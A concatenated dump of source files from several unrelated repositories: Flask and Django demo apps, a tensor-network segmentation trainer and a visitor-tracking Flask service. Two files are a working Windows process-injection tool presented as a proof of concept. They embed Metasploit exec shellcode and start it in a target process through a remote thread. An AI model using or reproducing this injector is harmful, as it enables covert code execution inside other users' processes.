    reply = input('Am I biatch? ')
    if not reply:
        return
    print('Yah, exactly you\'re biatch!')
    # Learning rate shrinks as the reply gets longer.
    t.train(1 / len(reply))


if __name__ == "__main__":
    main()
| {"/main.py": ["/train.py"]} |
49,926 | frayer/docker-k8s-first-steps | refs/heads/master | /arguments/__init__.py | import argparse
# Command-line options for the demo web server, parsed once at import time;
# consumers read `args.host` / `args.port`.
# NOTE(review): the description string is argparse-tutorial boilerplate —
# confirm the intended text.
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--port', '-p', type=int, required=False, help="port number", default=5000)
# BUG FIX: --host's help text was a copy-paste of --port's ("port number").
parser.add_argument('--host', type=str, required=False, help="host address", default='0.0.0.0')
args = parser.parse_args()
| {"/app.py": ["/arguments/__init__.py"]} |
49,927 | frayer/docker-k8s-first-steps | refs/heads/master | /app.py | from arguments import args
from flask import Flask, Response, json
import logging
import os
app = Flask(__name__)

# Bind address/port come from the command line (see the arguments package).
LISTEN_HOST = args.host
LISTEN_PORT = args.port


@app.route('/')
def root():
    """Return app metadata plus selected environment variables as JSON."""
    data = json.dumps({
        "appName": "python-flask-demo",
        "version": "1.0.0",
        "env": {
            # HOSTNAME typically identifies the container/pod instance.
            "host": os.getenv('HOSTNAME'),
            "user_defined_1": os.getenv('USER_DEFINED_1'),
            "user_defined_2": os.getenv('USER_DEFINED_2'),
            "user_defined_3": os.getenv('USER_DEFINED_3')
        }
    })
    return Response(data, mimetype="application/json")


if __name__ == '__main__':
    app.run(host=LISTEN_HOST, port=LISTEN_PORT)
| {"/app.py": ["/arguments/__init__.py"]} |
49,939 | djangobat/todo-app | refs/heads/master | /apps/todos/templatetags/todo_tags.py | from django import template
from apps.todos.models import Topic
register = template.Library()
@register.filter
def bg_color(topic):
    """Map a topic to a stable Bootstrap badge class based on its primary key."""
    palette = (
        'badge-primary', 'badge-success', 'badge-danger', 'badge-warning',
        'badge-info', 'badge-dark'
    )
    return palette[topic.id % len(palette)]
| {"/apps/todos/templatetags/todo_tags.py": ["/apps/todos/models.py"], "/apps/todos/views.py": ["/apps/todos/models.py", "/apps/todos/filters.py"], "/apps/todos/filters.py": ["/apps/todos/models.py"], "/apps/todos/admin.py": ["/apps/todos/models.py"]} |
49,940 | djangobat/todo-app | refs/heads/master | /apps/todos/views.py | from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from .models import Topic, Task
from .forms import CreateTopicForm
from .filters import TaskFilter
@login_required
def todo(request):
    """Main todo page: the current user's topics plus their tasks run
    through the GET-driven TaskFilter (topic/status/created window).
    """
    topics = Topic.objects.filter(owner=request.user)
    # Only tasks belonging to the user's own topics are filterable.
    query = Task.objects.filter(topic__owner=request.user)
    task_filter = TaskFilter(request.GET, queryset=query)
    # (Removed a leftover debug `print(task_filter.qs)`.)
    context = {
        'topics': topics,
        'tasks': task_filter.qs,
        'form': task_filter.form,
    }
    return render(request, 'todos/todo.html', context)
@login_required
def create_task(request):
    """Render the task-creation page.

    NOTE(review): no form handling is implemented yet — the view only
    renders the template. (Removed the unused `user` local.)
    """
    return render(request, 'todos/task_create.html')
@login_required
def create_topic(request):
    """Create a new Topic owned by the current user.

    GET renders an empty form; a valid POST saves the topic and redirects
    to the todo list; an invalid POST falls through and re-renders the
    bound form with its errors.
    """
    user = request.user
    if request.method == 'POST':
        form = CreateTopicForm(request.POST)
        if form.is_valid():
            # Attach the owner before persisting (not part of the form).
            new_topic = form.save(commit=False)
            new_topic.owner = user
            new_topic.save()
            return redirect('todo')
    else:
        form = CreateTopicForm()
    context = {
        'form': form,
    }
    return render(request, 'todos/topic_create.html', context)
49,941 | djangobat/todo-app | refs/heads/master | /apps/todos/models.py | from django.db import models
from django.conf import settings
class Topic(models.Model):
title = models.CharField(max_length=100)
description = models.TextField(blank=True)
owner = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='topics')
def __str__(self):
return self.title
class Task(models.Model):
COMPLETED = 'C'
DELETED = 'D'
ICOMPLETE = 'I'
CURRENT_STATUS = (
(ICOMPLETE, '<i class="fas fa-question text-warning"></i>Chưa hoàn thành'),
(COMPLETED, '<i class="fas fa-check text-success"></i>Đã hoàn thành'),
(DELETED, '<i class="fas fa-trash text-danger"></i>Đã xóa'),
)
topic = models.ForeignKey(Topic, related_name='tasks', on_delete=models.CASCADE, blank=True)
title = models.CharField(max_length=100)
order = models.PositiveIntegerField(default=0)
status = models.CharField(max_length=1, choices=CURRENT_STATUS, default=ICOMPLETE)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
def is_completed(self):
return self.status == self.COMPLETED
class Meta:
ordering = ('order', '-created',) | {"/apps/todos/templatetags/todo_tags.py": ["/apps/todos/models.py"], "/apps/todos/views.py": ["/apps/todos/models.py", "/apps/todos/filters.py"], "/apps/todos/filters.py": ["/apps/todos/models.py"], "/apps/todos/admin.py": ["/apps/todos/models.py"]} |
49,942 | djangobat/todo-app | refs/heads/master | /apps/todos/filters.py | import django_filters
from datetime import timedelta
import calendar
from django import forms
from django.utils.timezone import localtime, now
from .models import Topic, Task
def filter_created(queryset, name, value):
    """Filter a queryset on `created`: 'D' = today, 'W' = this ISO week,
    'M' = this calendar month; any other value returns the queryset
    unchanged.

    NOTE(review): the "start of today" bound does not zero microseconds —
    confirm whether sub-second precision matters here.
    """
    no = localtime(now())
    # Start of today in local time (hours/minutes/seconds zeroed).
    middle_no = no.replace(hour=0, minute=0, second=0)
    if value == 'D':
        return queryset.filter(created__gte=middle_no, created__lte=no)
    elif value == 'W':
        # isocalendar()[2] is the ISO weekday (Monday == 1).
        monday_of_this_week = middle_no - timedelta(days=(middle_no.isocalendar()[2] - 1))
        monday_of_next_week = monday_of_this_week + timedelta(days=7)
        return queryset.filter(created__gte=monday_of_this_week, created__lt=monday_of_next_week)
    elif value == 'M':
        # Only the month length is needed; the first weekday is irrelevant.
        # (Removed the unused `first_day`/misspelled `fist_weekday` locals.)
        _, number_of_days = calendar.monthrange(middle_no.year, middle_no.month)
        first_day_of_this_month = middle_no.replace(day=1)
        first_day_of_next_month = first_day_of_this_month + timedelta(days=number_of_days)
        return queryset.filter(created__gte=first_day_of_this_month, created__lt=first_day_of_next_month)
    return queryset
TIME_CHOICES = (
('D', 'Hôm nay'),
('W', 'Tuần này'),
('M', 'Tháng này'),
)
class TaskFilter(django_filters.FilterSet):
    """Filter tasks by topic, status and a coarse creation-time window."""

    # 'created' delegates to filter_created above ('D'/'W'/'M' windows).
    created = django_filters.ChoiceFilter(choices=TIME_CHOICES, widget=forms.Select, method=filter_created, empty_label='Tất cả')

    class Meta:
        model = Task
        fields = ('topic', 'status', 'created', )
| {"/apps/todos/templatetags/todo_tags.py": ["/apps/todos/models.py"], "/apps/todos/views.py": ["/apps/todos/models.py", "/apps/todos/filters.py"], "/apps/todos/filters.py": ["/apps/todos/models.py"], "/apps/todos/admin.py": ["/apps/todos/models.py"]} |
49,943 | djangobat/todo-app | refs/heads/master | /apps/todos/admin.py | from django.contrib import admin
from .models import Topic, Task
admin.site.register(Topic)
admin.site.register(Task) | {"/apps/todos/templatetags/todo_tags.py": ["/apps/todos/models.py"], "/apps/todos/views.py": ["/apps/todos/models.py", "/apps/todos/filters.py"], "/apps/todos/filters.py": ["/apps/todos/models.py"], "/apps/todos/admin.py": ["/apps/todos/models.py"]} |
49,989 | hmyit/pycodeinjector | refs/heads/master | /pycIndolor.py | #!/usr/bin/python
import sys
from pycodeinjection import *
def banner() :
print("""
|________|_____________________|_
| | | | | | | | | | | | | |________________
|________|_P_y_c_I_n_d_o_l_o_r_|_|
| | |
Simple PoC for pycodeinjection library
Proudly developed by Andrea Fortuna
andrea@andreafortuna.org
https://www.andreafortuna.org
""")
def usage():
print ("python " + sys.argv[0] + " <process to inject> <commands to inject>")
banner()
if len(sys.argv) < 3:
usage()
sys.exit(0)
print ("* Search process " + sys.argv[1])
target_pid = getPID(sys.argv[1])
if target_pid == 0:
print ("\tProcess " + sys.argv[1] + " non accessible...exiting!")
sys.exit(0)
print ("* Process found, start injection...")
shellcode = generateShellcode(sys.argv[2])
if injectShellcode(target_pid, shellcode):
print ("\tThread started!")
else:
print ("\tInjection failed")
| {"/pycIndolor.py": ["/pycodeinjection.py"]} |
49,990 | hmyit/pycodeinjector | refs/heads/master | /pycodeinjection.py | from ctypes import *
from win32com.client import GetObject
def getPID(processname):
    """Return the PID of the first running process named *processname*
    via WMI, or 0 when no match is found (Windows only).
    """
    WMI = GetObject('winmgmts:')
    p = WMI.ExecQuery('select * from Win32_Process where Name="%s"' %(processname))
    if len(p) == 0:
        return 0
    return p[0].Properties_('ProcessId').Value
def generateShellcode(cmdString):
    """Return the windows/exec payload stub (sourced from the Metasploit
    Framework, http://www.rapid7.com/db/modules/payload/windows/exec) with
    *cmdString* appended as the NUL-terminated command to execute.
    """
    stub = "".join((
        "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50",
        "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26",
        "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7",
        "\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78",
        "\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3",
        "\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01",
        "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58",
        "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3",
        "\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a",
        "\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d",
        "\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb",
        "\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c",
        "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53",
        "\xff\xd5",
    ))
    return stub + cmdString + "\x00"
# Injects shellcode into the process identified by *pid* and runs it on a
# new remote thread. Returns True when the thread was created, else False.
def injectShellcode(pid, shellcode):
    """Allocate RWX memory in the target process, copy *shellcode* there and
    start it with CreateRemoteThread (Windows only; offensive tooling).

    BUG FIX: `bytearray(str)` requires an encoding under Python 3 (the
    original raised TypeError), and the original then passed the *str*
    object — not raw bytes — to WriteProcessMemory. latin-1 maps each code
    point 0-255 to the identical byte value, preserving the payload.
    """
    payload = bytes(shellcode, 'latin-1') if isinstance(shellcode, str) else bytes(shellcode)
    # 0x1F0FFF == PROCESS_ALL_ACCESS
    process_handle = windll.kernel32.OpenProcess(0x1F0FFF, False, pid)
    # 0x1000 == MEM_COMMIT, 0x40 == PAGE_EXECUTE_READWRITE
    memory_allocation_variable = windll.kernel32.VirtualAllocEx(process_handle, None, len(payload), 0x1000, 0x40)
    windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, payload, len(payload), None)
    # Start a thread in the remote process at the injected code.
    if not windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, None, 0, None):
        return False
    return True
| {"/pycIndolor.py": ["/pycodeinjection.py"]} |
49,998 | Straffern/strided-tenet | refs/heads/main | /data/datasets.py | import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torchvision.utils import save_image
import torchvision.transforms as transforms
from torch.utils.data import TensorDataset, DataLoader, Dataset
from kornia.color import RgbToGrayscale
import pdb
import numpy as np
import itertools
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
def fold2d(x, b=1):
    """
    Inverse of a 2D unfold: reassemble b*d0*d0 patches of shape (h, w)
    into b images of shape (d0*h, d0*w), tiled in row-major patch order —
    patch (i, j) lands at y[:, i*h:(i+1)*h, j*w:(j+1)*w], exactly as the
    original nested Python loops produced.

    Improvements over the original: a single permute/reshape instead of
    O(d0^2) slice assignments, and the result keeps the input's dtype and
    device instead of being copied into a float32 buffer on the global
    `device` (the original required x to already live on that device).
    """
    d0 = int(np.sqrt(x.shape[0] / b))
    # NOTE(review): h is read from the last dim and w from the second-to-last;
    # for the square patches used in this repo the two coincide — confirm
    # before using rectangular patches.
    h = x.shape[-1]
    w = x.shape[-2]
    # (b, d0, d0, h, w) -> (b, d0, h, d0, w) -> (b, d0*h, d0*w)
    return x.view(b, d0, d0, h, w).permute(0, 1, 3, 2, 4).reshape(b, int(d0 * h), int(d0 * w))
def squeeze(x, kernel=3):
    """
    Gather each pixel's kernel x kernel neighbourhood and stack the shifted
    copies along a new leading dimension (zero padding at the borders), so
    out[k] is the input shifted by the k-th (row, col) offset.
    """
    half = kernel // 2
    # Zero-pad by `half` on every side so border pixels see zeros for
    # their out-of-image neighbours.
    padded = torch.zeros(x.shape[0] + kernel - 1, x.shape[1] + kernel - 1)
    padded[half:-half, half:-half] = x
    # One rolled copy per offset, in row-major offset order.
    layers = []
    for dr, dc in itertools.product(range(-half, half + 1), repeat=2):
        layers.append(torch.roll(padded, shifts=(dr, dc), dims=(0, 1)))
    stacked = torch.stack(layers)
    # Crop the padding back off.
    return stacked[:, half:-half, half:-half]
class lungCXR(Dataset):
def __init__(self, split='Train', data_dir = './',
fold=0,transform=None):
super().__init__()
self.data_dir = data_dir
self.transform = transform
folds = [0,1,2,3]
folds.remove(fold)
if split == 'Valid':
self.data, self.targets = torch.load(data_dir+'Fold'+repr(folds[0])+'.pt')
elif split == 'Train':
data0, targets0 = torch.load(data_dir+'Fold'+repr(folds[1])+'.pt')
data1, targets1 = torch.load(data_dir+'Fold'+repr(folds[2])+'.pt')
self.data = torch.cat((data0,data1),dim=0)
self.targets = torch.cat((targets0,targets1),dim=0)
else:
self.data, self.targets = torch.load(data_dir+'Fold'+repr(fold)+'.pt')
self.targets = self.targets.type(torch.FloatTensor)
self.data = self.data.squeeze().unsqueeze(3)
self.targets = self.targets.squeeze().unsqueeze(3)
def __len__(self):
return len(self.targets)
def __getitem__(self, index):
image, label = self.data[index], self.targets[index]
if self.transform is not None:
transformed = self.transform(image=image.numpy(),mask=label.numpy())
image = transformed["image"]
label = transformed["mask"]
return image, label.squeeze()
class MoNuSeg(Dataset):
    """MoNuSeg nuclei-segmentation dataset loaded from a pre-serialised
    `<split>.pt` file containing an (images, masks) tensor pair.
    """

    def __init__(self, split='Train', data_dir = './',transform=None):
        super().__init__()
        self.data_dir = data_dir
        self.transform = transform
        self.data, self.targets = torch.load(data_dir+split+'.pt')
        # Keep only the first (red) channel and move it to a trailing
        # channel axis: (N, H, W, 1). The kornia RgbToGrayscale instance
        # the original constructed here was never used, so it was removed.
        self.data = self.data.permute(0,3,1,2)[:,[0]].squeeze().unsqueeze(3)
        self.targets = self.targets.squeeze().unsqueeze(3)

    def __len__(self):
        return len(self.targets)

    def __getitem__(self, index):
        image, label = self.data[index], self.targets[index]
        if self.transform is not None:
            # Albumentations-style transform: keyword dict in, dict out.
            transformed = self.transform(image=image.numpy(),mask=label.numpy())
            image = transformed["image"]
            label = transformed["mask"]
        return image, label.squeeze()
| {"/train.py": ["/data/datasets.py"]} |
49,999 | Straffern/strided-tenet | refs/heads/main | /train.py | #!/usr/bin/env python3
import time
import torch
from models.mps import MPS
from torchvision import transforms, datasets
import pdb
from data.datasets import *
from utils.tools import *
import argparse
from carbontracker.tracker import CarbonTracker
from sklearn.metrics import precision_recall_curve, average_precision_score
from torchvision.utils import save_image
import torch.nn.functional as F
import albumentations as A
from albumentations.pytorch import ToTensorV2
import sys
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
# Globally load device identifier
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
def evaluate(loader,optThresh=0.5,testMode=False,plot=False,mode='Valid',post=False):
    """Run the model over *loader* and report average precision and loss.

    optThresh: probability cutoff used for the hard accuracy numbers; when
        testMode is False a new cutoff is chosen from the PR curve.
    plot: when True, dump a colour-coded TP/FP/FN overlay of the last batch
        to vis/ep<epoch>.jpg.
    post: currently unused; kept for interface compatibility.
    Returns (average_precision, mean_loss, optThresh).
    Relies on module-level globals: model, loss_fun, accuracy, dim, nCh,
    H, W, device, fold2d and epoch.
    """
    vl_acc = torch.Tensor([0.]).to(device)
    vl_loss = 0.
    labelsNp = []
    predsNp = []
    model.eval()
    for i, (inputs, labels) in enumerate(loader):
        labelsNp = labelsNp + labels.numpy().tolist()
        # Make patches on the fly, then flatten each patch to a 1D vector
        # as input to the MPS model.
        inputs = inputs.unfold(2,dim[0],dim[1]).unfold(3,dim[0],\
                dim[1]).reshape(-1,nCh,dim[0],dim[1])
        b = inputs.shape[0]
        inputs = inputs.view(b,nCh,-1)
        inputs = inputs.to(device)
        labels = labels.to(device)
        # Inference; guard against NaN logits poisoning the metrics.
        scores = torch.sigmoid(model(inputs))
        scores[scores.isnan()] = 0
        # Put patches back together into full-resolution score maps.
        scores = fold2d(scores.view(-1,dim[0],dim[1]),labels.shape[0])
        preds = scores.clone()
        loss = loss_fun(scores.view(-1,H,W), labels)
        predsNp = predsNp + preds.cpu().numpy().tolist()
        vl_loss += loss.item()
        vl_acc += accuracy(labels,preds.view(-1,H,W))
    # PR curve over the full (valid/test) set.
    # NOTE: precision_recall_curve returns (precision, recall, thresholds);
    # the original bound them to fpr/tpr, which was misleading.
    labelsNp, predsNp = np.array(labelsNp), np.array(predsNp)
    precision, recall, thresh = precision_recall_curve(labelsNp.reshape(-1), predsNp.reshape(-1))
    if not testMode:
        # Pick the threshold that maximises F1 = 2PR/(P+R).
        # (Removed the unused `alpha` local.)
        f1 = 2*precision*recall/(precision+recall)
        f1[np.isnan(f1)] = 0
        idx = np.argmax(f1)
        optThresh = thresh[idx]
        print("Opt Thresh: %.4f with Acc %.4f"%(thresh[idx],f1[idx]))
    acc_, acc_sample = accuracy(torch.Tensor(labelsNp),\
            torch.Tensor((predsNp >= optThresh).astype(float)),True)
    acc_std = torch.std(acc_sample)
    # BUG FIX: the original compared strings with identity (`mode is 'Test'`),
    # which only works via CPython interning; use equality.
    if mode == 'Test':
        acc_sample = acc_sample.cpu().data.numpy()
        print("Min.%.4f [%d]"%(acc_sample.min(),np.argmin(acc_sample)))
        print("Max.%.4f [%d]"%(acc_sample.max(),np.argmax(acc_sample)))
    print(mode+" Acc: %.2f +/- %.2f"%(acc_,acc_std))
    vl_acc = average_precision_score(labelsNp.reshape(-1), predsNp.reshape(-1))
    vl_loss = vl_loss/len(loader)
    if plot:
        # Overlay for up to 32 images of the LAST batch.
        # pred encodes: 0 = TN, 1 = FP, 2 = FN, 3 = TP
        # (hard prediction + 2 * label; the original comments had FP/FN/TP
        # mislabelled relative to this arithmetic).
        k = 32
        k = (labels.shape[0] if labels.shape[0] < k else k)
        tmp = torch.zeros(k,3,H,W).to(device)
        pred = ((preds[:k].view(-1,H,W) >= optThresh).float() \
                + 2*labels[:k])
        ### FP (predicted 1, label 0)
        tmp[:k,0,:,:][pred==1] = 0.55
        tmp[:k,1,:,:][pred==1] = 0.29
        tmp[:k,2,:,:][pred==1] = 0.39
        ### TP (predicted 1, label 1)
        tmp[:k,0,:,:][pred==3] = 0.13
        tmp[:k,1,:,:][pred==3] = 0.60
        tmp[:k,2,:,:][pred==3] = 0.20
        ## FN (predicted 0, label 1)
        tmp[:k,0,:,:][pred==2] = 0.6
        tmp[:k,1,:,:][pred==2] = 0.6
        tmp[:k,2,:,:][pred==2] = 0.6
        save_image(tmp,'vis/ep'+repr(epoch)+'.jpg')
    return vl_acc, vl_loss, optThresh
#### MAIN STARTS HERE ####
parser = argparse.ArgumentParser()
parser.add_argument('--num_epochs', type=int, default=100, help='Number of training epochs')
parser.add_argument('--batch_size', type=int, default=4, help='Batch size')
parser.add_argument('--fold', type=int, default=0, help='Fold to use for testing')
parser.add_argument('--feat', type=int, default=4, help='Number of local features')
parser.add_argument('--lr', type=float, default=5e-4, help='Learning rate')
parser.add_argument('--l2', type=float, default=0, help='L2 regularisation')
parser.add_argument('--p', type=float, default=0.5, help='Augmentation probability')
parser.add_argument('--aug', action='store_true', default=False, help='Use data augmentation')
parser.add_argument('--save', action='store_true', default=False, help='Save model')
parser.add_argument('--data', type=str, default='data/lungCXR/',help='Path to data.')
parser.add_argument('--bond_dim', type=int, default=2, help='MPS Bond dimension')
parser.add_argument('--kernel', type=int, default=4, help='Stride of squeeze kernel')
parser.add_argument('--seed', type=int, default=1, help='Random seed')
# Visualization and log dirs
if not os.path.exists('vis'):
os.mkdir('vis')
if not os.path.exists('logs'):
os.mkdir('logs')
logFile = 'logs/'+time.strftime("%Y%m%d_%H_%M")+'.txt'
makeLogFile(logFile)
args = parser.parse_args()
# Assign script args to vars
torch.manual_seed(args.seed)
batch_size = args.batch_size
kernel = args.kernel
feature_dim = args.feat
### Data processing and loading....
trans_valid = A.Compose([ToTensorV2()])
if args.aug:
trans_train = A.Compose([A.ShiftScaleRotate(shift_limit=0.5, \
scale_limit=0.5, rotate_limit=30, p=args.p),ToTensorV2()])
print("Using Augmentation with p=%.2f"%args.p)
else:
trans_train = trans_valid
print("No augmentation....")
print("Using Lung CXR dataset")
print("Using Fold: %d"%args.fold)
dataset_valid = lungCXR(split='Valid', data_dir=args.data,
transform=trans_valid,fold=args.fold)
dataset_train = lungCXR(split='Train', data_dir=args.data,fold=args.fold,
transform=trans_train)
dataset_test = lungCXR(split='Test', data_dir=args.data,fold=args.fold,
transform=trans_valid)
# Initiliaze input dimensions
dim = torch.ShortTensor(list(dataset_valid[0][0].shape[1:]))
nCh = int(dataset_valid[0][0].shape[0])
H = dim[0]
W = dim[1]
output_dim = H*W # Same as the number of pixels
num_train = len(dataset_train)
num_valid = len(dataset_valid)
num_test = len(dataset_test)
print("Num. train = %d, Num. val = %d, Num. test = %d"%(num_train,num_valid,num_test))
# Initialize dataloaders
loader_train = DataLoader(dataset = dataset_train, drop_last=False,num_workers=1,
batch_size=batch_size, shuffle=True,pin_memory=True)
loader_valid = DataLoader(dataset = dataset_valid, drop_last=True,num_workers=1,
batch_size=batch_size, shuffle=False,pin_memory=True)
loader_test = DataLoader(dataset = dataset_test, drop_last=True,num_workers=1,
batch_size=batch_size, shuffle=False,pin_memory=True)
nValid = len(loader_valid)
nTrain = len(loader_train)
nTest = len(loader_test)
# Initialize the models
dim = dim//args.kernel
print("Using Strided Tenet with patches of size",dim)
output_dim = torch.prod(dim)
model = MPS(input_dim=torch.prod(dim),
output_dim=output_dim,
bond_dim=args.bond_dim,
feature_dim=feature_dim*nCh,
lFeat=feature_dim)
model = model.to(device)
# Initialize loss and metrics
accuracy = dice
loss_fun = dice_loss()
# Initialize optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr,
weight_decay=args.l2)
nParam = sum(p.numel() for p in model.parameters() if p.requires_grad)
print("Number of parameters:%d"%(nParam))
print(f"Maximum MPS bond dimension = {args.bond_dim}")
print(f"Using Adam w/ learning rate = {args.lr:.1e}")
print("Local feature map dim: %d, nCh: %d, B:%d"%(feature_dim,nCh,batch_size))
with open(logFile,"a") as f:
print("Bond dim: %d"%(args.bond_dim),file=f)
print("Number of parameters:%d"%(nParam),file=f)
print(f"Using Adam w/ learning rate = {args.lr:.1e}",file=f)
print("Local feature map dim: %d, nCh: %d, B:%d"%(feature_dim,nCh,batch_size),file=f)
# Miscellaneous initialization
start_time = time.time()
maxAuc = -1
minLoss = 1e3
convCheck = 10
convIter = 0
# Instantiate Carbontracker
tracker = CarbonTracker(epochs=args.num_epochs,
log_dir='carbontracker/',monitor_epochs=-1)
# Training starts here
for epoch in range(args.num_epochs):
tracker.epoch_start()
running_loss = 0.
running_acc = 0.
t = time.time()
model.train()
predsNp = []
labelsNp = []
bNum = 0
for i, (inputs, labels) in enumerate(loader_train):
for p in model.parameters():
p.grad = None
bNum += 1
b = inputs.shape[0]
# Make patches on the fly
inputs = inputs.unfold(2,dim[0],dim[1]).unfold(3,dim[0],\
dim[1]).reshape(-1,nCh,dim[0],dim[1])
labels = labels.unfold(1,dim[0],dim[1]).unfold(2,dim[0],\
dim[1]).reshape(-1,dim[0],dim[1])
b = inputs.shape[0]
# Flatten to 1D vector as input to MPS
inputs = inputs.view(b,nCh,-1)
labelsNp = labelsNp + (labels.numpy()).tolist()
inputs = inputs.to(device)
labels = labels.to(device)
scores = torch.sigmoid(model(inputs))
loss = loss_fun(scores.view(-1), labels.view(-1))
# Backpropagate and update parameters
loss.backward()
optimizer.step()
with torch.no_grad():
preds = scores.clone()
predsNp = predsNp + (preds.data.cpu().numpy()).tolist()
running_acc += accuracy(labels,preds)
running_loss += loss
if (i+1) % 10 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, args.num_epochs, i+1, nTrain, loss.item()))
tr_acc = running_acc/nTrain
# Evaluate on Validation set
with torch.no_grad():
if tr_acc.isnan():
print('NaN error!')
break
vl_acc, vl_loss, optThresh = evaluate(loader_valid,testMode=True,plot=False)
if vl_acc > maxAuc or vl_loss < minLoss:
convIter = 0
if args.save:
torch.save(model.state_dict(),'saved_models/'+logFile.replace('.txt','.pt'))
if (vl_acc > maxAuc) or (vl_acc >= maxAuc and vl_loss < minLoss):
### Predict on test set if new optimum
maxAuc = vl_acc
print('New Best: %.4f'%np.abs(maxAuc))
ts_acc, ts_loss, _ = evaluate(loader=loader_test,\
optThresh=optThresh,testMode=True,plot=True,mode='Test')
print('Test Set Loss:%.4f\t Acc:%.4f'%(ts_loss, ts_acc))
with open(logFile,"a") as f:
print('Test Set Loss:%.4f\tAcc:%.4f'%(ts_loss, ts_acc),file=f)
convEpoch = epoch
elif vl_loss < minLoss:
minLoss = vl_loss
else:
convIter += 1
if convIter == convCheck:
print("Converged at epoch:%d with AUC:%.4f"%(convEpoch+1,maxAuc))
break
writeLog(logFile, epoch, running_loss/bNum, tr_acc,
vl_loss, np.abs(vl_acc), time.time()-t)
tracker.epoch_end()
tracker.stop()
| {"/train.py": ["/data/datasets.py"]} |
50,018 | melqueawq/analytics | refs/heads/master | /view/views.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from flask import request, render_template, send_file
from ._app import (app, getLogger, conversion, campaign,
config, uid_entry, db)
from .models import LogTable
import datetime
import base64
import io
import urllib.parse
import time
import sys
@app.route('/')
def index():
return render_template('index.html')
@app.route('/entry.js')
def entry_js():
    """Serve the per-customer tracking script with the visitor uid filled
    in and the beacon-image tag appended.
    """
    cid = request.args.get('cid')
    filename = 'user_js/' + str(cid) + '.js'
    # Read uid from the cookie; mint a timestamp-based one if absent.
    uid = request.cookies.get('uid', None)
    if not uid:
        uid = '{0:.0f}'.format(time.time()*100)
    # Register the uid for this customer.
    uid_entry(cid, uid)
    with open(filename, 'r') as f:
        js = f.read()
    # Substitute the uid placeholder in the customer script.
    js = js.replace('[!uid]', uid)
    # Append the tracking-pixel tag.
    # NOTE(review): cid is hard-coded to "1" in the generated query string
    # even though the requested cid selects the script file — confirm
    # whether this should be str(cid).
    js += 'image.src = location.protocol + "//127.0.0.1:5000/entry?"' \
        + ' + "cid=" + "1" + "&time=" + now.getTime()' \
        + ' + "&url=" + String(window.location).replace("&", "*")' \
        + ' + "&ref=" + String(document.referrer).replace("&", "*")' \
        + ' + "&uid=" + uid'
    if('p' in request.args):
        # BUG FIX (encoding): this literal had been mangled to '¶m'
        # (mojibake of '&param'); the /entry handler reads the 'param' key.
        js += '+ "&param=' + str(request.args.get('p')) + '"'
    js += ";"
    return js
@app.route('/entry')
def entry():
# 1x1GIF
gif = 'R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw =='
gif_str = base64.b64decode(gif)
url = urllib.parse.urlparse(request.args.get('url'))
# 拒否
if url.path in config['ignorepage']:
return send_file(io.BytesIO(gif_str), mimetype='image/gif')
url_qs = urllib.parse.parse_qs(url.query.replace('*', '&'))
# コンバージョン
if '--debug' in sys.argv:
if 'param' in request.args:
conversion(request)
# 媒体
if 'ad' in url_qs:
campaign(url_qs['ad'][0], request)
query = ''
for a in request.args:
query += request.args.get(a) + ', '
now = datetime.datetime.now()
ip = request.remote_addr
# ログ出力
logger = getLogger(__name__, 'entry.log')
logger.info('{0:%Y/%m/%d %H:%M:%S} - '.format(now) + ip + ' - ' + query)
# DB保存
row = LogTable(
cid=request.args.get('cid'),
uid=request.args.get('uid'),
ip=ip,
url=request.args.get('url'),
referrer=request.args.get('ref'),
param=request.args.get('param') if 'param' in request.args else None
)
LogTable.save_to_db(row)
return send_file(io.BytesIO(gif_str), mimetype='image/gif')
| {"/view/views.py": ["/view/_app.py", "/view/models.py"], "/view/models.py": ["/view/_app.py"], "/view/_app.py": ["/view/models.py"]} |
50,019 | melqueawq/analytics | refs/heads/master | /view/models.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from ._app import db
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
class LogTable(db.Model):
    """One tracked page-view / conversion event."""
    __tablename__ = 'LogTable'

    id = db.Column(db.Integer, primary_key=True)
    # BUG FIX: pass the callable `datetime.now`, not `datetime.now()`.
    # The original evaluated now() once at import time, stamping every row
    # with the process start-up time.
    date = db.Column(db.DateTime, default=datetime.now, nullable=False)
    cid = db.Column(db.Integer)    # customer/site id
    uid = db.Column(db.Integer)    # visitor id (minted by /entry.js)
    ip = db.Column(db.Text)
    url = db.Column(db.Text)
    referrer = db.Column(db.Text)
    param = db.Column(db.Text)     # optional conversion parameter

    def save_to_db(self):
